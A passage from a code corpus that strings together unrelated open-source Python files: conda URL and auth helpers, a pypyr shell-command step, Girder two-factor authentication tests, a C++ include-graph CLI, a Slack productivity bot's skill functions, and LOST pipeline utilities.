_token_match = re.search(r'/t/([a-zA-Z0-9-]*)', url)
token = _token_match.groups()[0] if _token_match else None
cleaned_url = url.replace('/t/' + token, '', 1) if token is not None else url
return cleaned_url.rstrip('/'), token
def split_platform(known_subdirs, url):
"""
Examples:
>>> from conda.base.constants import KNOWN_SUBDIRS
>>> split_platform(KNOWN_SUBDIRS, "https://1.2.3.4/t/tk-123/linux-ppc64le/path")
(u'https://1.2.3.4/t/tk-123/path', u'linux-ppc64le')
"""
_platform_match = _split_platform_re(known_subdirs).search(url)
platform = _platform_match.groups()[0] if _platform_match else None
cleaned_url = url.replace('/' + platform, '', 1) if platform is not None else url
return cleaned_url.rstrip('/'), platform
@memoize
def _split_platform_re(known_subdirs):
_platform_match_regex = r'/(%s)(?:/|$)' % r'|'.join(r'%s' % d for d in known_subdirs)
return re.compile(_platform_match_regex, re.IGNORECASE)
def has_platform(url, known_subdirs):
url_no_package_name, _ = split_filename(url)
if not url_no_package_name:
return None
maybe_a_platform = url_no_package_name.rsplit('/', 1)[-1]
return maybe_a_platform in known_subdirs and maybe_a_platform or None
def split_scheme_auth_token(url):
"""
Examples:
>>> split_scheme_auth_token("https://u:[email protected]/t/x1029384756/more/path")
('conda.io/more/path', 'https', 'u:p', 'x1029384756')
>>> split_scheme_auth_token(None)
(None, None, None, None)
"""
if not url:
return None, None, None, None
cleaned_url, token = split_anaconda_token(url)
url_parts = urlparse(cleaned_url)
remainder_url = Url(host=url_parts.host, port=url_parts.port, path=url_parts.path,
query=url_parts.query).url
return remainder_url, url_parts.scheme, url_parts.auth, token
def split_conda_url_easy_parts(known_subdirs, url):
# scheme, auth, token, platform, package_filename, host, port, path, query
cleaned_url, token = split_anaconda_token(url)
cleaned_url, platform = split_platform(known_subdirs, cleaned_url)
_, ext = strip_pkg_extension(cleaned_url)
cleaned_url, package_filename = cleaned_url.rsplit('/', 1) if ext else (cleaned_url, None)
# TODO: split out namespace using regex
url_parts = urlparse(cleaned_url)
return (url_parts.scheme, url_parts.auth, token, platform, package_filename, url_parts.host,
url_parts.port, url_parts.path, url_parts.query)
@memoize
def get_proxy_username_and_pass(scheme):
username = input("\n%s proxy username: " % scheme)
passwd = getpass("Password: ")
return username, passwd
def add_username_and_password(url, username, password):
url_parts = parse_url(url)._asdict()
url_parts['auth'] = username + ':' + quote(password, '')
return Url(**url_parts).url
def maybe_add_auth(url, auth, force=False):
"""Add auth if the url doesn't currently have it.
By default, does not replace auth if it already exists. Setting ``force`` to ``True``
overrides this behavior.
Examples:
>>> maybe_add_auth("https://www.conda.io", "user:passwd")
'https://user:[email protected]'
>>> maybe_add_auth("https://www.conda.io", "")
'https://www.conda.io'
"""
if not auth:
return url
url_parts = urlparse(url)._asdict()
if url_parts['auth'] and not force:
return url
url_parts['auth'] = auth
return Url(**url_parts).url
def maybe_unquote(url):
return unquote_plus(remove_auth(url)) if url else url
def remove_auth(url):
url_parts = parse_url(url)._asdict()
if url_parts['auth']:
del url_parts['auth']
return Url(**url_parts).url
if __name__ == "__main__":
import doctest
doctest.testmod()
|
pypyr/steps/dsl/cmd.py
|
mofm/pypyr
| 261 |
76009
|
<gh_stars>100-1000
"""pypyr step yaml definition for commands - domain specific language."""
import shlex
import subprocess
import logging
from pypyr.errors import ContextError
from pypyr.utils import types
# logger means the log level will be set correctly
logger = logging.getLogger(__name__)
class CmdStep():
"""A pypyr step that represents a command runner step.
This models a step that takes config like this:
cmd: <<cmd string>>
OR, as a dict
cmd:
run: str. mandatory. command + args to execute.
save: bool. defaults False. save output to cmdOut.
If save is True, will save the output to context as follows:
cmdOut:
returncode: 0
stdout: 'stdout str here. None if empty.'
stderr: 'stderr str here. None if empty.'
cmdOut.returncode is the exit status of the called process. Typically 0
means OK. A negative value -N indicates that the child was terminated by
signal N (POSIX only).
The run_step method does the actual work. init loads the yaml.
"""
def __init__(self, name, context):
"""Initialize the CmdStep.
The step config in the context dict looks like this:
cmd: <<cmd string>>
OR, as a dict
cmd:
run: str. mandatory. command + args to execute.
save: bool. optional. defaults False. save output to cmdOut.
cwd: str/path. optional. if specified, change the working
directory just for the duration of the command.
Args:
name: Unique name for step. Likely __name__ of calling step.
context: pypyr.context.Context. Look for config in this context
instance.
"""
assert name, ("name parameter must exist for CmdStep.")
assert context, ("context param must exist for CmdStep.")
# this way, logs output as the calling step, which makes more sense
# to end-user than a mystery steps.dsl.blah logging output.
self.logger = logging.getLogger(name)
context.assert_key_has_value(key='cmd', caller=name)
self.context = context
self.is_save = False
cmd_config = context.get_formatted('cmd')
if isinstance(cmd_config, str):
self.cmd_text = cmd_config
self.cwd = None
self.logger.debug("Processing command string: %s", cmd_config)
elif isinstance(cmd_config, dict):
context.assert_child_key_has_value(parent='cmd',
child='run',
caller=name)
self.cmd_text = cmd_config['run']
self.is_save = types.cast_to_bool(cmd_config.get('save', False))
cwd_string = cmd_config.get('cwd', None)
if cwd_string:
self.cwd = cwd_string
self.logger.debug("Processing command string in dir "
"%s: %s", self.cwd, self.cmd_text)
else:
self.cwd = None
self.logger.debug("Processing command string: %s",
self.cmd_text)
else:
raise ContextError(f"{name} cmd config should be either a simple "
"string cmd='mycommandhere' or a dictionary "
"cmd={'run': 'mycommandhere', 'save': False}.")
def run_step(self, is_shell):
"""Run a command.
Runs a program or executable. If is_shell is True, executes the command
through the shell.
Args:
is_shell: bool. defaults False. Set to true to execute cmd through
the default shell.
"""
assert is_shell is not None, ("is_shell param must exist for CmdStep.")
# why? If shell is True, it is recommended to pass args as a string
# rather than as a sequence.
if is_shell:
args = self.cmd_text
else:
args = shlex.split(self.cmd_text)
if self.is_save:
completed_process = subprocess.run(args,
cwd=self.cwd,
shell=is_shell,
# capture_output=True,only>py3.7
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
# text=True, only>=py3.7,
universal_newlines=True)
self.context['cmdOut'] = {
'returncode': completed_process.returncode,
'stdout': (completed_process.stdout.rstrip()
if completed_process.stdout else None),
'stderr': (completed_process.stderr.rstrip()
if completed_process.stderr else None)
}
# when capture is true, output doesn't write to stdout
self.logger.info("stdout: %s", completed_process.stdout)
if completed_process.stderr:
self.logger.error("stderr: %s", completed_process.stderr)
# don't swallow the error, because it's the Step swallow decorator
# responsibility to decide to ignore or not.
completed_process.check_returncode()
else:
# check=True throws CalledProcessError if exit code != 0
subprocess.run(args, shell=is_shell, check=True, cwd=self.cwd)
|
t_1000/__init__.py
|
chao5645/T-1000
| 111 |
76018
|
<filename>t_1000/__init__.py
from t_1000.application import T1000
|
test/test_user_otp.py
|
HailLab/girder
| 395 |
76023
|
# -*- coding: utf-8 -*-
import pytest
from girder.exceptions import AccessException
from girder.models.setting import Setting
from girder.models.user import User
from girder.settings import SettingKey
from pytest_girder.assertions import assertStatus, assertStatusOk
def testInitializeOtp(user):
# The logic for the server hostname as the issuer cannot be tested here, since there is no
# current request, but that logic is explicitly tested in testOtpApiWorkflow
Setting().set(SettingKey.BRAND_NAME, 'Branded Girder')
otpUris = User().initializeOtp(user)
# A URI for TOTP should be returned
assert otpUris['totpUri'].startswith('otpauth://')
assert user['login'] in otpUris['totpUri']
assert 'issuer=Branded%20Girder' in otpUris['totpUri']
# OTP should not be enabled yet, since it's not finalized
assert user['otp']['enabled'] is False
# TOTP parameters should be generated
assert 'totp' in user['otp']
def testHasOtpEnabled(user):
assert User().hasOtpEnabled(user) is False
User().initializeOtp(user)
# OTP is not yet enabled
assert User().hasOtpEnabled(user) is False
user['otp']['enabled'] = True
assert User().hasOtpEnabled(user) is True
def _tokenFromTotpUri(totpUri, valid=True):
# Create an external TOTP instance
from passlib.totp import TOTP
totp = TOTP.from_uri(totpUri)
# Generate a valid token
otpToken = totp.generate().token
if not valid:
# Increment the token by 1 to invalidate it
otpToken = '%06d' % ((int(otpToken) + 1) % int(1e6))
return otpToken
def testVerifyOtp(server, user):
# Enable OTP
otpUris = User().initializeOtp(user)
user['otp']['enabled'] = True
# Generate an invalid token
otpToken = _tokenFromTotpUri(otpUris['totpUri'], False)
with pytest.raises(AccessException):
User().verifyOtp(user, otpToken)
# Generate a valid token
otpToken = _tokenFromTotpUri(otpUris['totpUri'])
# Verify the token, which should succeed without raising an exception
User().verifyOtp(user, otpToken)
# Re-verify the same token, which should fail
# The "server" fixture is necessary for this to work
with pytest.raises(AccessException):
User().verifyOtp(user, otpToken)
def testAuthenticateWithOtp(user):
# Providing an unnecessary token should fail
with pytest.raises(AccessException):
User().authenticate('user', 'password', '<PASSWORD>')
# Enable OTP and save user
otpUris = User().initializeOtp(user)
user['otp']['enabled'] = True
User().save(user)
# Providing no token should now fail
with pytest.raises(AccessException):
User().authenticate('user', 'password')
# Generate a valid token
otpToken = _tokenFromTotpUri(otpUris['totpUri'])
# Authenticate successfully with the valid token
User().authenticate('user', 'password', otpToken)
def testAuthenticateWithOtpConcatenated(user):
# Non-OTP-user authentication should still succeed with "otpToken=True"
User().authenticate('user', 'password', True)
# Enable OTP and save user
otpUris = User().initializeOtp(user)
user['otp']['enabled'] = True
User().save(user)
# Authentication should now fail
with pytest.raises(AccessException):
User().authenticate('user', 'password', True)
# Generate a valid token
otpToken = _tokenFromTotpUri(otpUris['totpUri'])
# Authenticate successfully with the valid token
User().authenticate('user', 'password' + otpToken, True)
def testOtpApiWorkflow(server, user):
# Try to finalize OTP before it's been initialized
resp = server.request(
path='/user/%s/otp' % user['_id'], method='PUT', user=user,
additionalHeaders=[('Girder-OTP', '123456')])
# This should fail cleanly
assertStatus(resp, 400)
assert 'not initialized' in resp.json['message']
# Try to disable OTP before it's been enabled
resp = server.request(path='/user/%s/otp' % user['_id'], method='DELETE', user=user)
# This should fail cleanly
assertStatus(resp, 400)
assert 'not enabled' in resp.json['message']
# Initialize OTP
resp = server.request(path='/user/%s/otp' % user['_id'], method='POST', user=user)
assertStatusOk(resp)
# Save the URI
totpUri = resp.json['totpUri']
# Test the logic for server hostname as OTP URI issuer
assert 'issuer=127.0.0.1' in totpUri
# Login without an OTP
resp = server.request(path='/user/authentication', method='GET', basicAuth='<PASSWORD>:password')
# Since OTP has not been finalized, this should still succeed
assertStatusOk(resp)
# Finalize without an OTP
resp = server.request(
path='/user/%s/otp' % user['_id'], method='PUT', user=user)
assertStatus(resp, 400)
assert 'Girder-OTP' in resp.json['message']
# Finalize with an invalid OTP
resp = server.request(
path='/user/%s/otp' % user['_id'], method='PUT', user=user,
additionalHeaders=[('Girder-OTP', _tokenFromTotpUri(totpUri, False))])
assertStatus(resp, 403)
assert 'validation failed' in resp.json['message']
# Finalize with a valid OTP
resp = server.request(
path='/user/%s/otp' % user['_id'], method='PUT', user=user,
additionalHeaders=[('Girder-OTP', _tokenFromTotpUri(totpUri))])
assertStatusOk(resp)
# The valid token from this time period was used to finalize OTP; to prevent having to wait for
# the next time period, flush the rateLimitBuffer
from girder.utility._cache import rateLimitBuffer
rateLimitBuffer.invalidate()
# Login without an OTP
resp = server.request(path='/user/authentication', method='GET', basicAuth='user:password')
assertStatus(resp, 401)
assert 'Girder-OTP' in resp.json['message']
# Login with an invalid OTP
resp = server.request(
path='/user/authentication', method='GET', basicAuth='user:password',
additionalHeaders=[('Girder-OTP', _tokenFromTotpUri(totpUri, False))])
assertStatus(resp, 401)
assert 'Token did not match' in resp.json['message']
# Login with a valid OTP
resp = server.request(
path='/user/authentication', method='GET', basicAuth='user:password',
additionalHeaders=[('Girder-OTP', _tokenFromTotpUri(totpUri))])
assertStatusOk(resp)
# Disable OTP
resp = server.request(path='/user/%s/otp' % user['_id'], method='DELETE', user=user)
assertStatusOk(resp)
|
ig/main.py
|
goldsborough/
| 204 |
76029
|
'''Entry point and command line parsing for ig.'''
from __future__ import print_function
import argparse
import logging
import os
import sys
from ig import colors, graph, serve, walk
def setup_logging():
'''Sets up the root logger.'''
handler = logging.StreamHandler(sys.stderr)
formatter = logging.Formatter('[%(levelname)s] %(message)s')
handler.setFormatter(formatter)
log = logging.getLogger(__package__)
log.addHandler(handler)
log.setLevel(logging.INFO)
return log
def parse_arguments(args):
'''
Sets up the command line argument parser and parses arguments.
Args:
args: The list of argumnets passed to the command line
Returns:
The parsed arguments.
'''
parser = argparse.ArgumentParser(description='Visualize C++ include graphs')
parser.add_argument('directories',
nargs='+',
help='The directories to inspect')
parser.add_argument('--pattern',
action='append',
default=['*.[ch]pp', '*.[ch]'],
dest='patterns',
help='The file (glob) patterns to look for')
parser.add_argument('-i', '-I', '--prefix',
action='append',
dest='prefixes',
default=[os.getcwd()],
help='An include path for headers to recognize')
parser.add_argument('-v', '--verbose',
action='store_true',
help='Turn on verbose output')
parser.add_argument('-p', '--port',
type=int,
default=8080,
help='The port to serve the visualization on')
parser.add_argument('-o', '--open',
action='store_true',
help='Open the webpage immediately')
parser.add_argument('-j', '--json',
action='store_true',
help='Print the graph JSON instead of serving it')
parser.add_argument('-d', '--dir',
dest='directory',
help='The directory to store the served files in. If '
'not supplied, a temporary directory is created.')
parser.add_argument('--relation',
choices=['includes', 'included-by'],
default='included-by',
help='The relation of edges in the graph')
parser.add_argument('--min-degree',
type=float,
default=0.1,
help='The initial minimum degree nodes should have to '
'be displayed')
parser.add_argument('--group-granularity',
type=int,
default=2,
help='How coarse to group nodes (by folder)')
parser.add_argument('--full-path',
action='store_true',
help='If set, shows the full path for nodes')
parser.add_argument('--colors',
type=lambda p: colors.Colors(map(int, p.split(','))),
default='234, 82, 77',
help='The base RGB colors separated by commas')
parser.add_argument('--color-variation',
type=int,
default=200,
help='The variation in RGB around the base colors')
parser.add_argument('--color-alpha-min',
type=float,
default=0.7,
help='The minimum alpha value for colors')
args = parser.parse_args(args)
# Necessary for standard includes
args.prefixes.append('')
if not (0 <= args.color_alpha_min <= 1):
raise RuntimeError('--color-alpha-min must be in interval [0, 1]')
args.colors.variation = args.color_variation
args.colors.alpha_min = args.color_alpha_min
return args
def make_json(args, graph_json):
'''
Creates the JSON payload for the visualization.
Args:
args: The command line arguments.
graph_json: The JSON dict from the graph.
Returns:
The payload.
'''
if args.json:
print(graph_json)
sys.exit(0)
# Additional settings to configure the visualization
settings = dict(initialDegree=args.min_degree)
return dict(settings=settings, graph=graph_json)
def main():
log = setup_logging()
args = parse_arguments(sys.argv[1:])
if args.verbose:
log.setLevel(logging.DEBUG)
log.debug('Received arguments: %s', args)
include_graph = graph.Graph(args.relation,
args.full_path,
args.colors,
args.group_granularity)
walk.walk(include_graph, args)
if include_graph.is_empty:
log.debug('Could not find a single node, exiting')
sys.exit(-1)
json = make_json(args, include_graph.to_json())
with serve.Server(args.directory) as server:
server.write(json)
server.run(args.open, args.port)
log.info('Shutting down')
if __name__ == '__main__':
main()
|
kino/functions.py
|
DongjunLee/kino-bot
| 109 |
76043
|
<reponame>DongjunLee/kino-bot
# -*- coding: utf-8 -*-
import random
import re
import subprocess
import time
from .background import schedule
from .nlp.ner import NamedEntitiyRecognizer
from .skills.bus import Bus
from .skills.feed import FeedNotifier
from .skills.github import GithubManager
from .skills.humor import Humor
from .skills.maxim import Maxim
from .skills.naver import Naver
from .skills.question import AttentionQuestion
from .skills.question import HappyQuestion
from .skills.rescue_time import RescueTime
from .skills.samhangsi.generator import SamhangSiGenerator
from .skills.summary import Summary
from .skills.todoist import TodoistManager
from .skills.toggl import TogglManager
from .skills.trello import TrelloManager
from .skills.twitter import TwitterManager
from .skills.weather import Weather
from .slack.slackbot import SlackerAdapter
from .slack.resource import MsgResource
from .utils.arrow import ArrowUtil
from .utils.data_handler import DataHandler
from .utils.data_loader import SkillData
from .utils.data_loader import FeedData
from .utils.logger import Logger
from .utils.member import Member
class Functions(object):
IDEA_LIST = "Inbox"
KANBAN_TASKS = "Tasks"
KANBAN_DOING = "Doing"
KANBAN_DONE = "Done"
KANBAN_BREAK = "Break"
def __init__(self, slackbot=None):
self.data_handler = DataHandler()
self.registered = RegisteredFuctions().list
self.logger = Logger().get_logger()
if slackbot is None:
self.slackbot = SlackerAdapter()
else:
self.slackbot = slackbot
def check_go_to_bed(self):
summary = Summary()
summary.check_go_to_bed()
summary.check_commit_count()
self._reset_data()
def _reset_data(self):
self.data_handler.edit_cache(("feed_links", []), fname="cache_feed.json") # NOTE: hard-code
self.data_handler.edit_cache(("tweet_ids", []), fname="cache_feed.json")
FeedData().reset()
SkillData().reset()
def feed_notify(self):
"""
keyword: [["피드", "알다"], ["피드", "있다"], ["새 소식", "있다"]]
description: "Feed"
icon: ":spock-hand: "
"""
self.slackbot.send_message(text=MsgResource.FEED_ACK)
feed_notifier = FeedNotifier()
feed_notifier.notify_all()
twitter_manager = TwitterManager()
twitter_manager.notify_popular_tweet()
def health_check(self):
bot_id = self.slackbot.get_bot_id()
if self.slackbot.is_active(bot_id):
self.logger.info("Healthy.")
else:
# NOTE: restart with script.
subprocess.call("sh ~/restart_kino.sh", shell=True)
def holiday_setting(self):
"""
keyword: ["휴일", "쉬는 날", "holiday"]
description: "Holiday!"
icon: ":relaxed: "
"""
Summary().record_holiday(True)
self.slackbot.send_message(text=MsgResource.HOLIDAY)
def good_morning(self):
"""
keyword: ["굿모닝", "좋은 아침", "good morning"]
description: "Good Morning"
icon: ":sunrise: "
"""
self.slackbot.send_message(text=MsgResource.PROFILE_WAKE_UP)
self.forecast(timely="daily")
trello = TrelloManager()
trello.clean_board(except_list_name=[self.IDEA_LIST, self.KANBAN_BREAK])
self.kanban_sync()
def good_night(self):
"""
keyword: ["굿나잇", "굿밤", "자다", "good night"]
description: "Good Night"
icon: ":night_with_stars: "
"""
self.slackbot.send_message(text=MsgResource.PROFILE_GO_TO_BED)
summary = Summary()
summary.check_commit_count()
self._reset_data()
def activity_task_sync(self):
"""
keyword: ["토글 싱크"]
description: "Toggl <-> Task Sync"
icon: ":tornado: "
"""
toggl = TogglManager(slackbot=self.slackbot)
toggl.sync_task()
def air_quality(self):
"""
keyword: ["공기질", "미세먼지", "air quality"]
description: "Air quality forecast. (can use only Korea [airkoreaPy](https://github.com/DongjunLee/airkoreaPy))"
icon: ":factory: "
"""
weather = Weather(slackbot=self.slackbot)
weather.air_quality()
def attention_question(self, text: str = None):
"""
keyword: [["집중도", "조사"], ["집중도", "확인"], ["attention", "question"]]
description: "Attention survey after do task."
icon: ":writing_hand: "
"""
attention = AttentionQuestion(slackbot=self.slackbot)
attention.question()
def attention_report(self, timely: str = "daily"):
"""
keyword: [["집중도", "리포트"], ["attention", "report"]]
description: "Attention Report."
icon: ":writing_hand: "
"""
if timely is None:
timely = "daily"
attention = AttentionQuestion(slackbot=self.slackbot)
attention.report(timely=timely)
def bus_stop(self, station_id: str = None, real_time: str = None):
"""
keyword: [["버스", "도착"], ["버스", "언제"], ["버스", "조회"]]
description: "Bus arrival information. (can use only Korea (gbus api))"
icon: ":oncoming_bus: "
"""
if real_time is None:
real_time = False
bus = Bus(slackbot=self.slackbot)
bus.arrive_info(station_id, real_time=real_time)
def forecast(self, timely: str = "current"):
"""
keyword: ["날씨", "예보", "weather", "forecast"]
description: "Weather forecast. (using [darksky](https://darksky.net/))"
icon: ":sun_with_face: "
"""
if timely is None:
timely = "current"
weather = Weather(slackbot=self.slackbot)
weather.forecast(timely=timely)
self.air_quality()
def github_commit(self, timely: str = "daily"):
"""
keyword: ["커밋", "commit", "깃헙", "github"]
description: "Check [Github](https://github.com) push count."
icon: ":octocat: "
"""
if timely is None:
timely = "daily"
github = GithubManager(slackbot=self.slackbot)
github.commit(timely=timely)
def happy_question(self):
"""
keyword: [["행복도", "조사"], ["행복도", "확인"], ["happy", "question"]]
description: "Happiness survey."
icon: ":smile: "
"""
happy = HappyQuestion(slackbot=self.slackbot)
happy.question()
def happy_report(self, timely: str = "daily"):
"""
keyword: [["행복도", "리포트"], ["happy", "report"]]
description: "Happiness Report."
icon: ":smile: "
"""
if timely is None:
timely = "daily"
happy = HappyQuestion(slackbot=self.slackbot)
happy.report(timely=timely)
def honeyjam(self):
"""
keyword: [["재밌는", "이야기"], ["개그"]]
description: "**Easter Egg** - Korea Azae Humor (using [honeyjam](https://github.com/DongjunLee/honeyjam))."
icon: ":honey_pot: "
"""
humor = Humor()
question, answer = humor.honeyjam()
self.slackbot.send_message(text=MsgResource.HUMOR_QUESTION(question=question))
time.sleep(2)
self.slackbot.send_message(text=MsgResource.HUMOR_ANSWER(answer=answer))
haha_num = random.randint(1, 5)
self.slackbot.send_message(text=MsgResource.HUMOR_END(haha_num))
sorry_index = random.randint(1, 100)
if sorry_index < 25:
time.sleep(1)
self.slackbot.send_message(text=MsgResource.HUMOR_SORRY)
def jenkins_build(self, job_name: str = None, branch: str = None):
"""
keyword: ["배포", "deploy"]
description: "Build a registered project for Jenkins."
icon: ":building_construction: "
"""
jenkins = JenkinsClient()
jenkins.build(job_name, branch)
def kanban_sync(self):
"""
keyword: [["칸반", "싱크"], ["kanban", "sync"]]
description: "Todoist's tasks and Kanban board's card Syncing."
icon: ":clipboard: "
"""
self.slackbot.send_message(text=MsgResource.KANBAN_SYNC)
todoist = TodoistManager(slackbot=self.slackbot)
today_label_tasks = todoist.get_today_tasks_with_label()
trello = TrelloManager()
task_list = trello.get_list_by_name(self.KANBAN_TASKS)
task_list.archive_all_cards()
for task in today_label_tasks:
card_name = task["label"] + " - " + task["content"]
task_list.add_card(re.sub(r" \d+분", "", card_name))
def keep_idea(self, hashtag: str = None):
"""
keyword: [["keep", "idea"], ["킵", "아이디어"], ["아이디어", "저장"], ["아이디어", "기억"]]
description: "Keep idea in Trello board's inbox list."
icon: ":thinking_face: "
"""
if hashtag is None:
self.slackbot.send_message(text=MsgResource.HASHTAG_NOT_FOUND)
return
trello = TrelloManager()
trello.add_card(self.IDEA_LIST, hashtag)
self.slackbot.send_message(text=MsgResource.ADD_IDEA)
def maxim_nietzsche(self):
"""
keyword: [["니체", "명언"], ["nietzsche", "maxim"]]
description: "Nietzsche's Maxim."
icon: ":scales: "
"""
maxim = Maxim(slackbot=self.slackbot)
maxim.nietzsche()
def remind_idea(self):
"""
keyword: [["remind", "idea"], ["리마인드", "아이디어"]]
description: "Remind Trello's inbox card randomly pick."
icon: ":thinking_face: "
"""
trello = TrelloManager()
idea = trello.get_random_card_name()
if idea is None:
self.slackbot.send_message(text=MsgResource.EMPTY_IDEA)
else:
self.slackbot.send_message(text=MsgResource.REMIND_IDEA(idea=idea))
def rescuetime_efficiency(self, timely: str = "daily"):
"""
keyword: ["레스큐타임 효율성", "작업 효율", "생산성 차트", ["rescuetime", "chart"]]
description: "RescueTime Efficiency Chart"
icon: ":chart_with_upwards_trend: "
"""
if timely is None:
timely = "daily"
rescuetime = RescueTime(slackbot=self.slackbot)
rescuetime.efficiency(timely=timely)
def samhangsi(self, samhangsi_tag: str = None):
"""
keyword: ["삼행시"]
description: "I am thinking about the Samhangsi with the kor ballad! (using [char-rnn-tensorflow](https://github.com/DongjunLee/char-rnn-tensorflow))"
icon: ":musical_score: "
"""
word = samhangsi_tag[1:]
non_hangul = re.findall("[^ ㄱ-ㅣ가-힣]+", word)
if len(non_hangul) > 0:
self.slackbot.send_message(text=MsgResource.SAMHANGSI_ONLY_KOR)
return
self.slackbot.send_message(text=MsgResource.SAMHANGSI_PREPARE(word=word))
generator = SamhangSiGenerator()
generator.load_model()
result = generator.generate(word)
self.slackbot.send_message(text=result)
def send_message(self, text: str = None):
"""
keyword: []
description: "Send a text message."
icon: ":speech_balloon: "
"""
self.slackbot.send_message(text=text)
def today_briefing(self):
"""
keyword: [["하루", "브리핑"], ["오늘하루", "브리핑"], ["today", "briefing"]]
description: "Today Briefing - brief Todoist tasks"
icon: ":city_sunset: "
"""
todoist = TodoistManager(slackbot=self.slackbot)
todoist.schedule()
def today_summary(self, timely: str = None):
"""
keyword: [["하루", "마무리"], ["하루", "요약"], ["today", "summary"]]
description: "Today summary - **toggl_report**, **rescuetime_efficiency**, **happy_report**, **attention_report**, **github_commit**"
icon: ":night_with_stars: "
"""
self.slackbot.send_message(text=MsgResource.TODAY_SUMMARY)
# self.todoist_feedback()
self.toggl_report(timely=timely)
self.rescuetime_efficiency(timely=timely)
self.happy_report(timely=timely)
self.attention_report(timely=timely)
self.github_commit(timely=timely)
def todoist_feedback(self):
"""
keyword: [["할일", "피드백"], ["todoist", "feedback"]]
description: "Feedback from Todoist activity."
icon: ":memo: "
"""
todoist = TodoistManager(slackbot=self.slackbot)
todoist.feedback()
def todoist_remain(self):
"""
keyword: [["남은", "작업"], ["remain", "task"]]
description: "Show todoist's remaining tasks."
icon: ":page_with_curl: "
"""
todoist = TodoistManager(slackbot=self.slackbot)
todoist.remain_task()
def toggl_checker(self):
"""
keyword: [["작업", "시간"], ["시간", "체크"], ["task", "time", "check"]]
description: "Toggl time checker Every 30 minutes."
icon: ":bell: "
"""
toggl = TogglManager(slackbot=self.slackbot)
toggl.check_toggl_timer()
def toggl_report(self, kind: str = "chart", timely: str = "daily"):
"""
keyword: [["작업", "리포트"], ["task", "report"]]
description: "Toggl task Report."
icon: ":bar_chart: "
"""
if kind is None:
kind = "chart"
if timely is None:
timely = "daily"
toggl = TogglManager(slackbot=self.slackbot)
toggl.report(kind=kind, timely=timely)
def toggl_timer(self, description: str = None):
"""
keyword: ["toggl"]
description: "Toggl Timer."
icon: ":watch: "
"""
toggl = TogglManager(slackbot=self.slackbot)
toggl.timer(description=description)
def total_chart(self):
"""
keyword: [["종합", "차트"], ["overall", "chart"], ["total", "chart"]]
description: "Overall chart - weekly productivity, happiness, overall score chart."
icon: ":chart: "
"""
summary = Summary(slackbot=self.slackbot)
summary.total_chart()
def total_score(self):
"""
keyword: [["종합", "점수"], ["overall", "score"], ["total", "score"]]
description: "Overall score - Productivity (RescueTime, Github Commit, Todoist, Toggl), Mean happiness, mean attention, Exercise, Diary."
icon: ":chart: "
"""
summary = Summary(slackbot=self.slackbot)
summary.total_score()
def translate(self, english: str = "", source: str = "en", target: str = "ko"):
"""
keyword: ["번역", "translate"]
description: "Language translation using [Naver Papago api](https://developers.naver.com/docs/nmt/reference/)."
icon: ":crystal_ball: "
"""
if source is None:
source = "en"
if target is None:
target = "ko"
naver = Naver(slackbot=self.slackbot)
naver.translate(english, source=source, target=target)
class RegisteredFuctions(object):
class __List:
def __init__(self):
self.list = DataHandler().read_file("skills.json")
instance = None
def __init__(self):
if not RegisteredFuctions.instance:
RegisteredFuctions.instance = RegisteredFuctions.__List()
def __getattr__(self, name):
return getattr(self.instance, name)
class FunctionRunner(object):
def __init__(self, text=None):
self.input = text
self.functions = Functions().registered
self.logger = Logger().get_logger()
def load_function(
self,
start_time=None,
end_time=None,
func_name=None,
params=None,
repeat=False,
day_of_week=None,
not_holiday=False,
):
if not_holiday and Summary().is_holiday():
return
if not ArrowUtil.is_today_day_of_week(day_of_week):
return
if not repeat:
self.__excute(func_name, params)
return schedule.CancelJob
elif (repeat) and (ArrowUtil.is_between(start_time, end_time)):
self.__excute(func_name, params)
def __excute(self, func_name, params):
self.logger.info("load_function: " + str(func_name) + ", " + str(params))
getattr(Functions(), func_name)(**params)
def filter_f_params(self, text, func_name):
ner = NamedEntitiyRecognizer()
func_param_list = ner.skills[func_name]["params"]
params = {k: ner.parse(v, text) for k, v in ner.params.items()}
member = Member()
member_name = member.get_names(text)
params["member"] = member_name
f_params = {}
if params is not None:
for k, v in params.items():
if k in func_param_list and v is not None:
f_params[k] = v
return f_params
|
backend/lost/logic/pipeline/exec_utils.py
|
JonasGoebel/lost
| 490 |
76050
|
<reponame>JonasGoebel/lost
import os
import hashlib
import importlib
import zipfile
def zipdir(path, out_path, timestamp=None):
# zipf is zipfile handle
zipf = zipfile.ZipFile(out_path, 'w', zipfile.ZIP_DEFLATED)
for root, dirs, files in os.walk(path):
for file in files:
src = os.path.join(root, file)
if timestamp is None:
dst = os.path.relpath(os.path.join(root, file),
os.path.join(path, '..'))
else:
dst = os.path.relpath(os.path.join(f'{root}_{timestamp}', file),
os.path.join(path, '..'))
zipf.write(src, dst)
zipf.close()
# def module_to_bytes(path, ignore=['__pycache__']):
# # zipf is zipfile handle
# cont = b''
# for root, dirs, files in os.walk(path):
# for file in files:
# for i in ignore:
# src = os.path.join(root, file)
# if i not in src:
# with open(src, 'rb') as f:
# cont += f.read()
# return cont
def get_module_hash(path, ignore=['__pycache__']):
# zipf is zipfile handle
sha = hashlib.sha256()
for root, dirs, files in os.walk(path):
for file in files:
for i in ignore:
src = os.path.join(root, file)
if i not in src:
with open(src, 'rb') as f:
sha.update(f.read())
# cont += f.read()
return sha.hexdigest()
def import_by_string(full_name):
module_name, unit_name = full_name.rsplit('.', 1)
mod = importlib.import_module(module_name)
return getattr(mod, unit_name)
def exec_dyn_class(idx, class_name):
my_class = import_by_string(class_name)
instance = my_class(idx)
return instance._run(ret_success=True)
def get_import_name_by_script(script_name, timestamp=None):
mod_name = os.path.splitext(script_name)[0]
if timestamp is not None:
mod_list = mod_name.split('.')
mod_list[0] = f'{mod_list[0]}_{timestamp}'
mod_name = '.'.join(mod_list)
return f'{mod_name}.LostScript'
|
tests/unit_test_benchmarking.py
|
JamesPHoughton/pysd
| 240 |
76069
|
import os
from unittest import TestCase
# most of the features of this script are already tested indirectly when
# running vensim and xmile integration tests
_root = os.path.dirname(__file__)
class TestErrors(TestCase):
def test_canonical_file_not_found(self):
from pysd.tools.benchmarking import runner
with self.assertRaises(FileNotFoundError) as err:
runner(os.path.join(_root, "more-tests/not_existent.mdl"))
self.assertIn(
'Canonical output file not found.',
str(err.exception))
def test_non_valid_model(self):
from pysd.tools.benchmarking import runner
with self.assertRaises(ValueError) as err:
runner(os.path.join(
_root,
"more-tests/not_vensim/test_not_vensim.txt"))
self.assertIn(
'Modelfile should be *.mdl or *.xmile',
str(err.exception))
def test_non_valid_outputs(self):
from pysd.tools.benchmarking import load_outputs
with self.assertRaises(ValueError) as err:
load_outputs(
os.path.join(
